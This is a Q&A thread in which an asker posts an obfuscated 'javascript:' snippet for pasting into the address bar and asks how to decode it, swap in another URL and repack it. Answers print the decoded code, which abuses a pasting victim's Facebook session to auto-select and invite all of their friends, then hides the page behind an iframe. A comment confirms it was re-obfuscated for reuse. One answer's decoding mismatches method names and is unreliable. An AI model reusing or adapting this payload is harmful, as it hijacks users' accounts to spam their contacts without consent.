# Javascript in address bar, how do I decipher?

Tags: javascript, facebook, hex, encryption

I have a javascript code that appears to be encrypted:

```
javascript:var _0xe788=[&quot;\x69\x6E\x6E\x65\x72\x48\x54\x4D\x4C&quot;,&quot;\x61\x70\x70\x34\x39\x34\x39\x37\x35\x32\x38\x37\x38\x5F\x62\x6F\x64\x79&quot;,&quot;\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x42\x79\x49\x64&quot;,&quot;\x3C\x61\x20\x69\x64\x3D\x22\x73\x75\x67\x67\x65\x73\x74\x22\x20\x68\x72\x65\x66\x3D\x22\x23\x22\x20\x61\x6A\x61\x78\x69\x66\x79\x3D\x22\x2F\x61\x6A\x61\x78\x2F\x73\x6F\x63\x69\x61\x6C\x5F\x67\x72\x61\x70\x68\x2F\x69\x6E\x76\x69\x74\x65\x5F\x64\x69\x61\x6C\x6F\x67\x2E\x70\x68\x70\x3F\x63\x6C\x61\x73\x73\x3D\x46\x61\x6E\x4D\x61\x6E\x61\x67\x65\x72\x26\x61\x6D\x70\x3B\x6E\x6F\x64\x65\x5F\x69\x64\x3D\x31\x31\x36\x38\x37\x38\x34\x39\x34\x39\x39\x32\x36\x35\x37\x22\x20\x63\x6C\x61\x73\x73\x3D\x22\x20\x70\x72\x6F\x66\x69\x6C\x65\x5F\x61\x63\x74\x69\x6F\x6E\x20\x61\x63\x74\x69\x6F\x6E\x73\x70\x72\x6F\x5F\x61\x22\x20\x72\x65\x6C\x3D\x22\x64\x69\x61\x6C\x6F\x67\x2D\x70\x6F\x73\x74\x22\x3E\x53\x75\x67\x67\x65\x73\x74\x20\x74\x6F\x20\x46\x72\x69\x65\x6E\x64\x73\x3C\x2F\x61\x3E&quot;,&quot;\x73\x75\x67\x67\x65\x73\x74&quot;,&quot;\x4D\x6F\x75\x73\x65\x45\x76\x65\x6E\x74\x73&quot;,&quot;\x63\x72\x65\x61\x74\x65\x45\x76\x65\x6E\x74&quot;,&quot;\x63\x6C\x69\x63\x6B&quot;,&quot;\x69\x6E\x69\x74\x45\x76\x65\x6E\x74&quot;,&quot;\x64\x69\x73\x70\x61\x74\x63\x68\x45\x76\x65\x6E\x74&quot;,&quot;\x73\x65\x6C\x65\x63\x74\x5F\x61\x6C\x6C&quot;,&quot;\x73\x67\x6D\x5F\x69\x6E\x76\x69\x74\x65\x5F\x66\x6F\x72\x6D&quot;,&quot;\x2F\x61\x6A\x61\x78\x2F\x73\x6F\x63\x69\x61\x6C\x5F\x67\x72\x61\x70\x68\x2F\x69\x6E\x76\x69\x74\x65\x5F\x64\x69\x61\x6C\x6F\x67\x2E\x70\x68\x70&quot;,&quot;\x73\x75\x62\x6D\x69\x74\x44\x69\x61\x6C\x6F\x67&quot;,&quot;\x3C\x69\x66\x72\x61\x6D\x65\x20\x73\x72\x63\x3D\x22\x67\x6F\x6F\x67\x6C\x65\x2E\x63\x6F\x6D\x22\x20\x73\x74\x79\x6C\x65\x3D\x22\x77\x69\x64\x74\x68\x3A\x20\x38\x32\x30\x70\x78\x3B\x20\x68\x65\x69\x67\x68\x74\x3A\x20\x36\x30\x30\x70\x78\x3B\x22\x20\x66\x72\x61\x6D\x65\x62\x6F\x72\x64\x65\x72\x3D\x30\x20\x73\x63\x72\x6F\x6C\x6C\x69\x6E\x67\x3D\x22\x6E\x6F\x22\x3E\x3C\x2F\x69\x66\x72\x61\x6D\x65\x3E&quot;];var variables=[_0xe788[0],_0xe788[1],_0xe788[2],_0xe788[3],_0xe788[4],_0xe788[5],_0xe788[6],_0xe788[7],_0xe788[8],_0xe788[9],_0xe788[10],_0xe788[11],_0xe788[12],_0xe788[13]]; void (document[variables[2]](variables[1])[variables[0]]=variables[3]);var ss=document[variables[2]](variables[4]);var c=document[variables[6]](variables[5]);c[variables[8]](variables[7],true,true); void ss[variables[9]](c); void setTimeout(function (){fs[variables[10]]();} ,4000); void setTimeout(function (){SocialGraphManager[variables[13]](variables[11],variables[12]);} ,5000); void (document[variables[2]](variables[1])[variables[0]]=_0xe788[14]);
```

I have seen similar instances and I have heard it may be Hex. I have been doing some google research and have found some online deciphers for Hex yet they all seem to struggle decrypting the code.

I basically need to decipher this code, change some variables and repack it exactly how I found it but replacing a URL. How can I go about this? Are there any free online tools available?

Many thanks.

Answer (score 2, accepted):

I removed the `javascript:` from the beginning of the code and replaced `&quot;` with `"`, as this was clearly taken from the internals of an HTML tag. Then I ran it through the [Online JavaScript Beautifier](http://jsbeautifier.org/) and got this, which should be a little more helpful:

```
var variables = ['innerHTML', 'app4949752878_body', 'getElementById', '<a id="suggest" href="#" ajaxify="/ajax/social_graph/invite_dialog.php?class=FanManager&amp;node_id=116878494992657" class=" profile_action actionspro_a" rel="dialog-post">Suggest to Friends</a>', 'suggest', 'MouseEvents', 'createEvent', 'click', 'initEvent', 'dispatchEvent', 'select_all', 'sgm_invite_form', '/ajax/social_graph/invite_dialog.php', 'submitDialog'];
void(document[variables[2]](variables[1])[variables[0]] = variables[3]);
var ss = document[variables[2]](variables[4]);
var c = document[variables[6]](variables[5]);
c[variables[8]](variables[7], true, true);
void ss[variables[9]](c);
void setTimeout(function () {
    fs[variables[10]]();
}, 4000);
void setTimeout(function () {
    SocialGraphManager[variables[13]](variables[11], variables[12]);
}, 5000);
void(document[variables[2]](variables[1])[variables[0]] = '<iframe src="google.com" style="width: 820px; height: 600px;" frameborder=0 scrolling="no"></iframe>');
```

Comment: Thank you, I just altered your code and obfuscated it using an online obfuscater.

Comment: I wish that site had a "Clear" button!

Comment: @Pointy: ctrl+a for select all, then backspace.  Or cmd+a then delete on a mac.

Answer (score 1):

```
void (document.getElementById('app4949752878_body').innerHTML='<a id="suggest" href="#" ajaxify="/ajax/social_graph/invite_dialog.php?class=FanManager&amp;node_id=116878494992657" class=" profile_action actionspro_a" rel="dialog-post">Suggest to Friends</a>';);
var ss=document.getELementById('suggest');
var c=document.createEvent('MouseEvents');
c.dispatchEvent('click',true,true);
void ss.select_all(c);
void setTimeout(function (){fs.dispatchEvent();} ,4000);
void setTimeout(function (){SocialGraphManager.submitDialog('sgm_invite_form','/ajax/social_graph/invite_dialog.php');} ,5000);
void (document.getElementById('app4949752878_body').innerHTML='<iframe src="google.com" style="width: 820px; height: 600px;" frameborder=0 scrolling="no"></iframe>');
```

Answer (score 0):

Here's an old page I wrote a long time ago that's handy for dealing with bookmarklets: http://gutfullofbeer.net/escape.html

It's really trivial but I find a use for it every once in a while. (Wouldn't directly help with that code, however, because it wouldn't undo that silly hex encoding stuff.)

Answer (score 0):

You should read this : http://translate.google.fr/translate?hl=fr&sl=fr&tl=en&u=http://www.siteduzero.com/tutoriel-3-167589-les-bookmarklets-ou-comment-modifier-la-page-d-un-site-depuis-la-barre-d-adresse.html#ss_part_3
Using vois really isn't the better way preventing the browser from catching the return value.
Closures are much better. Moreover because they prevent bookmarklets from putting global vars.